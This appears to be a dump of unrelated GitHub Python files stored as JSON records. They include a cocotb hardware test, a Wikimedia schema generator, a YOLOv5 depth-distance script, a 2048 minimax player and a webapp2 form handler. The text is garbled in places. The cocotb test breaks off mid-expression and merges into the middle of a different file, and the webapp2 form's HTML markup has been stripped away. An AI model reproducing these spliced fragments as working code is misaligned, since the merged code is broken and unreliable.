name=\"watchlist\"),\n\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"categories/\", views.category_view, name=\"category_view\"),\n\n]\n","repo_name":"Reboot9/auction-project","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4319205041","text":"import os\nimport cocotb_test.simulator\n\nimport cocotb\nfrom cocotb.log import SimLog\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import RisingEdge, Timer, ClockCycles, FallingEdge\n\n@cocotb.test()\nasync def run_test_spaced_2lvl_penc(dut):\n sys_clk = cocotb.fork(Clock(dut.clk, 2).start())\n\n dut.rst <= 0\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n dut.rst <= 1\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n dut.rst <= 0\n\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n\n dut.one_hot <= 56\n await RisingEdge(dut.clk)\n dut.one_hot <= 58\n await RisingEdge(dut.clk)\n dut.one_hot <= 343\n await RisingEdge(dut.clk)\n print (56,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n dut.one_hot <= 4024\n await RisingEdge(dut.clk)\n print (58,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n await RisingEdge(dut.clk)\n print (343,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n await RisingEdge(dut.clk)\n print (4024,'\\t',str(dut.index.value), str(dut.valid.value), str(dut.error.value))\n await RisingEdge(dut.clk)\n await RisingEdge(dut.clk)\n\n print (\"TEST1: single bit index verification.\")\n dut.one_hot <= (1<<0)\n await RisingEdge(dut.clk)\n dut.one_hot <= (1<<1)\n for i in range(2,4606):\n await RisingEdge(dut.clk)\n await FallingEdge(dut.clk)\n assert int(str(dut.index[(i-2)%8].value),2) == (i-2)\n dut.one_hot <= (1< 1:\n object_dict[ZID] = {\"anyOf\": can_be}\n else:\n object_dict[ZID] = can_be[0]\n\n while self._to_update:\n zid, display_zid, spec = self._to_update.pop()\n self._update_from_spec(object_dict, zid, display_zid, spec)\n\n # Compose the resulting .yaml file.\n #\n # Start with comment if appropriate.\n contents = \"\"\n comment = literal_spec.get(\"comment\")\n if comment is not None:\n contents += f\"# {comment}\\n\"\n\n # Append YAML dict.\n fake_file = io.StringIO()\n yaml.dump(schema, 
fake_file)\n fake_file.seek(0)\n contents += fake_file.read()\n\n with contextlib.ExitStack() as stack:\n if dry_run:\n outp = sys.stdout\n else:\n outp = stack.enter_context(\n open(os.path.join(self._root, f\"{ZID}.yaml\"), \"w\")\n )\n outp.write(contents)\n\n def _list(self):\n for key in self._builtin_dict.keys():\n yield key\n\n def list(self):\n for key in self._list():\n print(key)\n\n def generate_all(self, root_directory=None, tag=None, dry_run=True):\n for ZID in self._list():\n logging.info(f\"Generating config for {ZID} ...\")\n self.generate(ZID, root_directory, tag, dry_run)\n\n\nif __name__ == \"__main__\":\n import fire\n\n logging.basicConfig(level=logging.DEBUG)\n fire.Fire(SchemaComponent)\n","repo_name":"wikimedia/abstract-wiki-schemata-generator","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":19084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24022852421","text":"import operator as op\nfrom functools import reduce\n\ndef solution(n):\n answer = 0\n j = 0\n for i in range(n, -1, -2):\n answer += nCr(i + j, j)\n j += 1\n return answer % 1000000007\n\n\ndef nCr(n, r):\n if n < 1 or r < 0 or n < r:\n raise ValueError\n r = min(r, n-r)\n numerator = reduce(op.mul, range(n, n-r, -1), 1)\n denominator = reduce(op.mul, range(1, r+1), 1)\n return numerator // denominator\n\n\n","repo_name":"hugh4652/Programmers","sub_path":"레벨 3/2 X n 타일링/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26832482098","text":"import numpy as np\nimport re\nimport itertools\nfrom collections import Counter\nfrom tensorflow.contrib import learn\nimport jieba\n\ndef clean_str(string):\n \"\"\"\n Tokenization/string cleaning for all datasets except for SST.\n Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py\n \"\"\"\n #string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", string)\n string = re.sub(r\"\\'s\", \" \\'s\", string)\n string = re.sub(r\"\\'ve\", \" \\'ve\", string)\n string = re.sub(r\"n\\'t\", \" n\\'t\", string)\n string = re.sub(r\"\\'re\", \" \\'re\", string)\n string = re.sub(r\"\\'d\", \" \\'d\", string)\n string = re.sub(r\"\\'ll\", \" \\'ll\", string)\n string = re.sub(r\",\", \" , \", string)\n string = re.sub(r\"!\", \" ! \", string)\n string = re.sub(r\"\\(\", \" \\( \", string)\n string = re.sub(r\"\\)\", \" \\) \", string)\n #string = re.sub(r\"\\?\", \" \\? 
\", string)\n #string = re.sub(r\"\\s{2,}\", \" \", string)\n return string.strip().lower()\n\ndef load_data_and_labels(data_file):\n \"\"\"\n Loads MR polarity data from files, splits the data into words and generates labels.\n Returns split sentences and labels.\n \"\"\"\n # Load data from files\n obj = open(data_file, \"r\")\n y, x_text, query= [],[],[]\n for ele in obj:\n ele = ele.strip().split(\"\\t\")\n if len(ele) !=5 or ele[0].strip() not in [\"1\", \"-1\"]:\n #print ele\n continue\n if (ele[0].strip() == \"1\"):\n y.append([0])\n else:\n y.append([1])\n\n query_text = ele[1].strip().decode(\"utf8\")\n doc_text = ele[2].strip().decode(\"utf8\")\n x_text.append( \" \".join( jieba.cut(doc_text) ) )\n query.append( \" \".join( jieba.cut(query_text) ) )\n return [x_text, np.array(y), np.array(query)]\n\ndef batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data)-1)/batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]\n\ndef build_voc(train_data_file, test_data_file, dev_sample_percentage, max_document_length):\n print(\"Loading data...\")\n train_doc, train_label, train_query = load_data_and_labels(train_data_file)\n test_doc, test_label, test_query = load_data_and_labels(test_data_file)\n\n # Build vocabulary\n #max_document_length = max([len(x.split(\" \")) for x in train_doc])\n vocab_processor = learn.preprocessing.VocabularyProcessor(max_document_length, 2)\n vocab_processor.fit(train_doc)\n\n train_doc_feas = np.array(list(vocab_processor.transform(train_doc)))\n train_query_feas = np.array(list(vocab_processor.transform(train_query)))\n\n test_doc_feas = np.array(list(vocab_processor.transform(test_doc)))\n test_query_feas = np.array(list(vocab_processor.transform(test_query)))\n\n np.random.seed(9)\n shuffle_indices = np.random.permutation(np.arange(len(train_label)))\n train_doc_feas_shuffled = train_doc_feas[shuffle_indices]\n train_query_feas_shuffled = train_query_feas[shuffle_indices]\n train_label_shuffled = train_label[shuffle_indices]\n\n # Split train/test set\n dev_sample_index = -1 * int(dev_sample_percentage * float(len(train_label)))\n train_doc_feas, dev_doc_feas = train_doc_feas_shuffled[:dev_sample_index], train_doc_feas_shuffled[dev_sample_index:]\n train_label, dev_label = train_label_shuffled[:dev_sample_index], train_label_shuffled[dev_sample_index:]\n train_query_feas, dev_query_feas = train_query_feas_shuffled[:dev_sample_index], train_query_feas_shuffled[dev_sample_index:]\n\n print(\"Vocabulary Size: {:d}\".format(len(vocab_processor.vocabulary_)))\n return train_doc_feas, train_label, train_query_feas, dev_doc_feas, dev_label, dev_query_feas, test_doc_feas, test_label, test_query_feas\n","repo_name":"lansedefen/research","sub_path":"ml_learning/tensorflow/dssm/data_helpers.py","file_name":"data_helpers.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25944214656","text":"from __future__ import absolute_import, division, 
print_function\n\nimport torch\nimport cv2 as cv\n\nimport os\nimport sys\nimport glob\nimport argparse\nimport numpy as np\nimport PIL.Image as pil\nimport matplotlib as mpl\nimport matplotlib.cm as cm\nfrom sklearn.linear_model import LinearRegression\n\nimport torch\nfrom torchvision import transforms, datasets\n\nimport networks\nfrom layers import disp_to_depth\nfrom util import download_model_if_doesnt_exist\nfrom evaluate_depth import STEREO_SCALE_FACTOR\nimport numpy as np\nfrom PIL import Image\nimport copy\n\nimport time\n\n\n#Return pandas DataFrame contains (x_min, y_min) and (x_max, y_max) and classes of object in frame\ndef model_yolov5(frame, model):\n # Model\n #model = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)\n\n # Inference\n results = model(frame)\n results.print()\n return results.pandas().xyxy[0]\n\n\n#Return an numpy array represents for depth map\ndef depth_predict(image_path, encoder, depth_decoder):\n\n original_width, original_height = image_path.shape[1], image_path.shape[0]\n\n # PREDICTING ON EACH IMAGE IN TURN\n with torch.no_grad():\n\n # Load image and preprocess\n image_path = cv.resize(\n image_path, (feed_width, feed_height), cv.INTER_LANCZOS4)\n image_path = transforms.ToTensor()(image_path).unsqueeze(0)\n\n # PREDICTION, encoder and decoder\n image_path = image_path.to(device)\n features = encoder(image_path)\n outputs = depth_decoder(features)\n\n disp = outputs[(\"disp\", 0)]\n disp_resized = torch.nn.functional.interpolate(\n disp, (original_height, original_width), mode=\"bilinear\", align_corners=False)\n\n scaled_disp, depth = disp_to_depth(disp, 0.1, 100)\n metric_depth = STEREO_SCALE_FACTOR * depth.cpu().numpy()\n\n metric_depth = resize_depth_map(\n metric_depth, original_width, original_height)\n\n return metric_depth\n\n\ndef resize_depth_map(metric_depth, original_width, original_height):\n metric_depth = torch.from_numpy(metric_depth)\n metric_depth_resized = torch.nn.functional.interpolate(metric_depth,\n (original_height, original_width), mode=\"bilinear\", align_corners=False)\n\n # Saving colormapped depth image\n metric_depth_resized_np = metric_depth_resized.squeeze().cpu().numpy()\n return metric_depth_resized_np\n\n\n#Calculate relative distance of objects in the image from depth map and bounder box\n#depth_map : nparray\n#data: Dataframe obtains from yolov5\n#return dataframe that contain collumn \"rev_distance\"\ndef calculate_rev(depth_map, data):\n rev_dis = []\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax'])\n y_max = int(row[1]['ymax'])\n\n rev = 0\n num = (y_max - y_min) * (x_max - x_min)\n for i in range(y_min, y_max):\n for j in range(x_min, x_max):\n rev += depth_map[i, j]\n rev /= num\n rev_dis.append(rev)\n\n data['rev_distance'] = rev_dis\n return data\n\n\ndef calculate_abs(depth_map, data):\n abs_dis = []\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax']) # Wight\n y_max = int(row[1]['ymax']) # Hight\n \n # Tính median của tất cả các giá trị depth trong bounding box\n depth_box = depth_map[y_min:y_max, x_min:x_max]\n median_depth = np.median(depth_box)\n\n # Tính khoảng cách tuyệt đối\n absolute_distance = ((-0.00056 * median_depth ** 2 +\n 0.146 * median_depth + 1.02) * 0.5) * 100\n\n abs_dis.append(absolute_distance)\n\n data['abs_distance'] = abs_dis\n return data\n\n\ndef calculate_abs2(depth_map, data, camera_height):\n abs_dis = []\n for row in 
data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax']) # Wight\n y_max = int(row[1]['ymax']) # Hight\n \n # Tính median của tất cả các giá trị depth trong bounding box\n depth_box = depth_map[y_min:y_max, x_min:x_max]\n median_depth = np.median(depth_box)\n \n # Fit a linear regression model to obtain the coefficients c0, c1, and c2\n X = np.array([[median_depth**2], [median_depth], [1]])\n Y = np.array([camera_height]).reshape((1, 1))\n \n model = LinearRegression().fit(X, Y)\n c0, c1, c2 = model.intercept_[0], model.coef_[1], model.coef_[2]\n\n # Calculate the absolute distance using equation (1)\n absolute_distance = (c0 + c1 * median_depth +\n c2 * median_depth**2) * camera_height\n \n abs_dis.append(absolute_distance)\n\n data['abs_distance'] = abs_dis\n return data\n\n#Drawing label and distance on frame\n#frame: image\n#data: dataFrame contain relative distance\ndef drawing_output(frame, model, encoder, depth_decoder):\n frame_temp = copy.copy(frame)\n y = model_yolov5(frame_temp, model)\n map = depth_predict(frame, encoder, depth_decoder)\n data = calculate_abs(map, y)\n\n for row in data.iterrows():\n x_min = int(row[1]['xmin'])\n y_min = int(row[1]['ymin'])\n x_max = int(row[1]['xmax'])\n y_max = int(row[1]['ymax'])\n\n name_label = row[1]['name']\n rev = row[1]['abs_distance']\n \n # x = rev\n # h = 0.5\n # c0, c1, c2 = 1.02, 0.146, -0.00056\n # abs_dis = ((c0 + c1*x + c2*x**2) * h ) * 100\n \n \n str_output = name_label + \": \" + str(int(rev)) + \"cm\"\n # # TEST\n\n # # Example input: camera height and bounding box\n # camera_height = 1.5\n # bounding_box = [x_min, y_min, x_max, y_max]\n\n # # Call the function to calculate the absolute distance (ABS) from the camera\n # absolute_distance = calculate_abs_distance(\n # map, camera_height, bounding_box)\n # cv.putText(frame, \"abs {:.2f} cm\".format(\n # abs_dis), (x_min, y_max), cv.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n cv.rectangle(frame, (x_min, y_min),\n (x_max, y_max),\n (0, 0, 255), 2, 8)\n cv.putText(frame, str_output, (x_min, y_min),\n cv.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 255), 1, cv.LINE_AA)\n return frame\n\n\ndef calculate_abs_distance(depth_image, camera_height, bounding_box):\n # Extract the estimated distances of all the pixels inside the bounding box\n print(\"DepthMap nay de xem\", depth_image)\n distances = depth_image[bounding_box[0]:bounding_box[2], bounding_box[1]:bounding_box[3]]\n print(\"bounding_box[0]\", bounding_box[0])\n print(\"bounding_box[2]\", bounding_box[2])\n print(\"bounding_box[1]\", bounding_box[1])\n print(\"bounding_box[3]\", bounding_box[3])\n # Compute the relative distance (REV) of the object\n relative_distance = np.median(distances)\n print(\"relative_distance\", relative_distance)\n # Define the input X and the output Y for the curve fitting\n X = np.array([[relative_distance**2], [relative_distance], [1]])\n Y = np.array([camera_height])\n\n # Fit a linear regression model to obtain the coefficients c0, c1, and c2\n model = LinearRegression().fit(X, Y)\n c0, c1, c2 = model.coef_[0], model.coef_[1], model.coef_[2]\n\n # Calculate the absolute distance (ABS) using equation (1)\n absolute_distance = (c0 + c1 * relative_distance +\n c2 * relative_distance**2) * camera_height\n\n return absolute_distance\n\n\nif __name__ == '__main__':\n model = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)\n model_name = \"mono+stereo_640x192\"\n\n #use GPU\n if torch.cuda.is_available():\n device = torch.device(\"cuda\")\n 
else:\n device = torch.device(\"cpu\")\n\n #\n download_model_if_doesnt_exist(model_name)\n model_path = os.path.join(\"models\", model_name)\n print(\"-> Loading model from \", model_path)\n encoder_path = os.path.join(model_path, \"encoder.pth\")\n depth_decoder_path = os.path.join(model_path, \"depth.pth\")\n\n # LOADING PRETRAINED MODEL\n print(\" Loading pretrained encoder\")\n encoder = networks.ResnetEncoder(18, False)\n loaded_dict_enc = torch.load(encoder_path, map_location=device)\n\n # extract the height and width of image that this model was trained with\n feed_height = loaded_dict_enc['height']\n feed_width = loaded_dict_enc['width']\n filtered_dict_enc = {\n k: v for k, v in loaded_dict_enc.items() if k in encoder.state_dict()}\n encoder.load_state_dict(filtered_dict_enc)\n encoder.to(device)\n encoder.eval()\n\n print(\" Loading pretrained decoder\")\n depth_decoder = networks.DepthDecoder(\n num_ch_enc=encoder.num_ch_enc, scales=range(4))\n\n loaded_dict = torch.load(depth_decoder_path, map_location=device)\n depth_decoder.load_state_dict(loaded_dict)\n\n depth_decoder.to(device)\n depth_decoder.eval()\n\n # Open the camera\n cap = cv.VideoCapture(0)\n\n # Continuously capture images from the camera\n while True:\n\n # Read a depth frame from the camera\n ret, frame = cap.read()\n if ret == False:\n break\n\n frame = drawing_output(frame, model, encoder, depth_decoder)\n\n cv.imshow(\"Object Detection\", frame)\n\n # Break the loop if the 'q' key is pressed\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Release the camera and close the window\n cap.release()\n cv.destroyAllWindows()\n","repo_name":"DTPThuy/absDistance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40641400791","text":"from exercise2 import *\nfrom larcc import *\n\n\"\"\"\nLAR FUNCTIONS\n\"\"\"\n\n# Translates points of a model, adding 3rd dimension if necessary\n# author: Stefano Russo\ndef translateModel(model,tvect):\n\tV,CV = model\n\t# add 3rd dimension to points if necessary\n\tif len(V[0])==2 and len(tvect)==3:\n\t\tV = AA ( lambda x: x+[0.0] ) (V)\n\t# add 3rd dimension to tvect if necessary\n\tif len(V[0])==3 and len(tvect)==2:\n\t\ttvect = tvect+[0]\n\tV = translatePoints(V,tvect)\n\treturn V,CV\n\n# Unifies models of the list, giving a single model\n# author: Stefano Russo\ndef larStruct(model_list):\n\tfinalV=[]\n\tfinalCV=[]\n\tcount=0\n\tfor m in model_list:\n\t\tfinalV=finalV+m[0]\n\t\ttempCV = AA(AA(lambda x: x+count))(m[1])\n\t\tfinalCV=finalCV+tempCV\n\t\tcount = count + len(m[0])\n\treturn finalV,finalCV\n\n# Multiplies a lar model, giving new lar model composed by all sub-models\n# author: Stefano Russo\ndef multiply(n,tvect,model):\n\toldV,oldCV=model\n\t# transform points from integer to float\n\toldV = AA(AA (lambda x: float(x))) (oldV)\n\t# add 3rd dimension to points if necessary\n\tif len(oldV[0])==2 and len(tvect)==3:\n\t\toldV = AA ( lambda x: x+[0.0] ) (oldV)\n\t# add 3rd dimension to tvect if necessary\n\tif len(oldV[0])==3 and len(tvect)==2:\n\t\ttvect = tvect+[0]\n\tnewV = oldV\n\tnewCV = oldCV\n\t# each iteration multiplies the model\n\tfor i in range(1,n):\n\t\t# translate points of \"tvect*i\"\n\t\tnewV = newV + translatePoints(oldV, AA(lambda x: x*i)(tvect))\n\t\t# create new cells, related to above points\n\t\tnewCV = newCV + AA(AA(lambda x: x+(len(oldV)*i)))(oldCV)\n\treturn 
newV,newCV\n\n\"\"\"\nGRASS\n\"\"\"\n\ngrass = COLOR(P_GREEN)(CUBOID([250,250,4.5]))\ngrass = T(3)(-4.5)(grass)\n\n\"\"\"\nNEAR BUILDINGS\n\"\"\"\n# building 1\nbuilding1_base = larIntervals([1,1,1])([50,30,20])\nbuilding1_roof_1 = translateModel( larIntervals([1,1,1])([52,32,1]) , [-1,-1,20] )\nbuilding1_roof_v = [ [-1,-1,21],[51,-1,21],[51,31,21],[-1,31,21],[10,15,27],[40,15,27] ]\nbuilding1_roof_c = [ [0,1,2,3,4,5] ]\nbuilding1 = larStruct([building1_base,building1_roof_1,(building1_roof_v,building1_roof_c)])\n\n# silos\nsilo_base = larRod((10,50))()\nsilo_top = translateModel(larSphere(10)([9,18]),[0,0,50])\nsilo = larStruct([silo_base,silo_top])\nsilo = translateModel(silo,[-5,110])\nsilos = multiply(3,[25,0],silo)\n\n# near buildings assembly\nnear_buildings = COLOR(P_SBROWN)(STRUCT(MKPOLS(building1) + MKPOLS(silos)))\n\n\"\"\"\nROAD\n\"\"\"\n\n# asphalt\nasphalt = COLOR(BLACK)(CUBOID([250,20,0.05]))\n\n# sidewalk\nsidewalk = T(2)(0.25)(CUBOID([250,5,0.01]))\n\n# road assembly\nroad = STRUCT([sidewalk, \n\tT(2)(25.5)(sidewalk),\n\tT(2)(5.5)(asphalt)])\n\n# pathway\npathway = T([1,2])([11.5,-19])(CUBOID([3.5,17,0.05]))\n\n\"\"\"\nAREA ASSEMBLY\n\"\"\"\n\n# area_model = STRUCT([ T(2)(20)(road), grass,\n# \tT([1,2,3])([140,80]) (S([1,2,3])([1.5,1.5,1.5])(pathway)),\n# \tT([1,2,3])([30,80]) (S([1,2,3])([1.5,1.5,1.5])(pathway)),\n# \tT([1,2,3])([140,80,-0.2])( S([1,2,3])([1.5,1.5,1.5])(house_model_3D)),\n# \tT([1,2])([35,80]) (near_buildings)])\n\n# VIEW(area_model)","repo_name":"cvdlab-alumni/436425","sub_path":"2014-04-11/python/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4074051892","text":"from random import randint\n\nfrom BaseAI import BaseAI\n\n\n\nimport time\n\nimport numpy as np\n\ntimeLimit = 0.2\ntolerence = 1 # at most eat up tolerence*100% of the time limit\ndepth_limit = 5\nclass PlayerAI(BaseAI):\n \"\"\"\n 0: \"UP\",\n 1: \"DOWN\",\n 2: \"LEFT\",\n 3: \"RIGHT\"\n \"\"\"\n def __init__(self):\n self.prevTime = None\n\n def getMove(self, grid):\n\n # Simple random move\n # return self._randomMove(grid)\n self.prevTime = time.process_time()\n action = self._minmax(grid)\n\n # minmax startegy\n if action is not None:\n return action\n else:\n return np.random.choice(range(grid.size))\n \n def _minmax(self, grid):\n cur_depth = 0\n child, _, action = self._maximize(grid, -np.inf, np.inf, cur_depth)\n \n return action\n\n def _maximize(self, state, alpha, beta, depth):\n\n # terminal state\n if not state.canMove():\n # print(\"###### Max node is terminated.\")\n return None, state.getMaxTile(), None\n\n # heuristically terminal state\n if depth > depth_limit or (time.process_time() - self.prevTime) > tolerence * timeLimit :\n return None, self._eval(state), None\n\n maxChild, maxUtility, maxAction = None, -np.inf, None\n\n for (action, child) in self._getChildrens(state, method = 'max'):\n _, utility = self._minimize(child, alpha, beta, depth+1)\n\n if utility > maxUtility:\n maxChild, maxUtility, maxAction = child, utility, action\n\n if maxUtility >= beta:\n break\n\n if maxUtility >= alpha:\n alpha = maxUtility\n\n return maxChild, maxUtility, maxAction\n\n\n def _minimize(self, state, alpha, beta, depth):\n\n # Terminal state\n if not state.getAvailableCells():\n return None, state.getMaxTile()\n\n if (time.process_time() - self.prevTime) > tolerence * timeLimit or depth > depth_limit:\n\n return None, self._eval(state)\n\n 
minChild, minUtility = None, np.inf\n\n for child in self._getChildrens(state, method='min'):\n _, utility, _action = self._maximize(child, alpha, beta, depth+1)\n\n if utility < minUtility:\n minChild, minUtility = child, utility\n\n if minUtility <= alpha:\n break\n\n if minUtility < beta:\n beta = minUtility\n\n return minChild, minUtility\n\n def _eval(self, state):\n\n score_config = np.array(state.map)\n score_config_filter_positive = score_config[score_config > 0]\n\n weight_mat_snaked = np.array([[2**28, 2**24, 2**20, 2**16],\n [2**8, 2**9, 2**10, 2**11],\n [2**7, 2**6, 2**5, 2**4],\n [2**0, 2**1, 2**2, 2**3]]).astype(np.int64)\n\n\n h1 = len(state.getAvailableCells())\n h2 = np.sum(np.multiply( weight_mat_snaked, score_config))\n\n return h2\n\n def _getChildrens(self, state, method):\n\n if method == 'max':\n\n action_children_pair = []\n\n for move in state.getAvailableMoves():\n grid = state.clone()\n grid.move(move)\n action_children_pair.append((move, grid))\n\n return sorted(action_children_pair, key = lambda x: self._eval(x[1]), reverse=True)\n\n elif method == 'min':\n\n children = []\n\n for move in state.getAvailableCells():\n if state.canInsert(move):\n #for newValue in [2, 4]:\n grid = state.clone()\n newValue = np.random.choice([2, 4])\n grid.insertTile(move, newValue)\n children.append(grid)\n\n return sorted(children, key=self._eval, reverse=False)\n\n else:\n raise Exception(f'{method} unsupported.')\n\n\n\n def _randomMove(self, grid):\n\n moves = grid.getAvailableMoves()\n\n return moves[randint(0, len(moves) - 1)] if moves else None","repo_name":"waitaminutewhoareyou/edX-Artificial-Intelligence","sub_path":"Week 4 Project - Adversarial Search and Games/PlayerAI.py","file_name":"PlayerAI.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73668543184","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0020_auto_20150228_2219'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='article',\n name='game_theme',\n field=models.CharField(default=b'btn-primary', help_text=b'Enter a color theme for this review', max_length=20, choices=[(b'btn-primary', b'Blue'), (b'btn-success', b'Green'), (b'btn-info', b'Light Blue'), (b'btn-warning', b'Yellow'), (b'btn-danger', b'Red')]),\n preserve_default=True,\n ),\n ]\n","repo_name":"awaseem/vgre.me","sub_path":"django_project/article/migrations/0021_auto_20150228_2245.py","file_name":"0021_auto_20150228_2245.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"4104481169","text":"import webapp2\nimport cgi\n\nform=\"\"\"\n
<form method=\"post\">\n What is your birthday?\n <br>\n <label>Month <input type=\"text\" name=\"month\" value=\"%(month)s\"></label>\n <label>Day <input type=\"text\" name=\"day\" value=\"%(day)s\"></label>\n <label>Year <input type=\"text\" name=\"year\" value=\"%(year)s\"></label>\n <div style=\"color: red\">%(error)s</div>\n <br>\n <input type=\"submit\">\n</form>
\n\"\"\"\n\n\nmonths = ['January',\n 'February',\n 'March',\n 'April',\n 'May',\n 'June',\n 'July',\n 'August',\n 'September',\n 'October',\n 'November',\n 'December']\n\nmonths_abbvs = dict((m[:3].lower(),m) for m in months)\n \ndef valid_month(month):\n if month:\n short_month = month[:3].lower()\n return months_abbvs.get(short_month)\n\ndef valid_day(day):\n if day and day.isdigit():\n dayInt = int(day)\n if (dayInt>=1) and (dayInt<=31):\n return dayInt\n\ndef valid_year(year):\n if year and year.isdigit():\n yearInt = int(year)\n if (yearInt>=1900) and (yearInt<=2020):\n return yearInt\n\nclass MainHandler(webapp2.RequestHandler):\n def write_form(self, error=\"\", month=\"\", day=\"\", year=\"\"):\n self.response.out.write(form % {\"error\": error,\n \"month\": cgi.escape(month, quote=True),\n \"day\": cgi.escape(day, quote=True),\n \"year\": cgi.escape(year, quote=True)})\n \n def get(self):\n self.write_form()\n\n def post(self):\n user_month = self.request.get('month')\n user_day = self.request.get('day')\n user_year = self.request.get('year')\n\n month = valid_month(user_month)\n day = valid_day(user_day)\n year = valid_year(user_year)\n\n if not (day and month and year):\n self.write_form(\"That's NOT valid!\",\n user_month, user_day, user_year)\n else:\n self.redirect(\"/thanks\")\n\nclass ThanksHandler(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('Thanks!')\n \napp = webapp2.WSGIApplication([('/', MainHandler), ('/thanks', ThanksHandler)],\n debug=True)\n","repo_name":"daniloz/dzf-test","sub_path":"helloUdacity/main_CS253_Unit2_part2.py","file_name":"main_CS253_Unit2_part2.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41802437070","text":"import crawl\nimport convert\nimport align\n\nprint(\"\\n\\nStart crawling? (Y/N)\")\nans = input().lower()\nif ans != \"\":\n if ans[0] == \"y\":\n crawl.start()\n\nprint(\"\\n\\nConvert to OWL? (Y/N)\")\nans = input().lower()\nif ans != \"\":\n if ans[0] == \"y\":\n convert.start()\n\nprint('\\n\\nDo you want to align and merge your data with \"./ontology/ontology.owl\"? 
(Y/N)')\nans = input().lower()\nif ans != \"\":\n if ans[0] == \"y\":\n align.start()\n","repo_name":"mahtab-nejati/ontology_of_movies","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26244251875","text":"import csv\nimport datetime\n\n\nclass DataStore:\n\n def __init__(self, filename, fieldnames):\n self.filename = filename\n self.data = list()\n self.fieldnames = fieldnames\n try:\n with open(self.filename, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n for item in reader:\n self.data.append(item)\n\n except FileNotFoundError:\n with open(self.filename, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.fieldnames)\n writer.writeheader()\n\n\n def save(self, dict):\n self.data.append(dict)\n with open(self.filename, 'a', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.fieldnames)\n writer.writerow(dict)\n\n\n def get(self):\n for item in self.data:\n yield item\n\n\n","repo_name":"vkorovin/hw15","sub_path":"bot/databckend.py","file_name":"databckend.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70744553426","text":"import numpy as np\nimport random\nfrom local_search import *\nfrom oxfl import OXFL\nfrom utils import fitness\n\n\n#range es mas eficiente que range in python2, in python3 range = range()pyton2\n\n###########################################################################################\n############################### read data ##############################################\ninstance = 'x60189_4'\n\n\nmatrix = np.genfromtxt(instance + '/matrix_conservative.csv', delimiter=',')\nfragments = np.array([])\n\n#fh = open(instance + '/frag_x60189_7.dat')\nfh = open(instance + '/frag_'+ instance +'.dat')\nwhile True:\n line = fh.readline().replace('\\n', '')\n fragments = np.append(fragments, line)\n if not line:\n break\nfh.close()\nfragments = fragments[1::2]\nnum_fragments = fragments.shape[0]\n\n#print(matrix.shape)\n#print(fragments.shape)\n\n###########################################################################################\n###########################################################################################\n\nITERATIONS = 2\nN = 32\nAP = 0.02\nFL = 0.75\nP_LS = 0.49\ncrows = 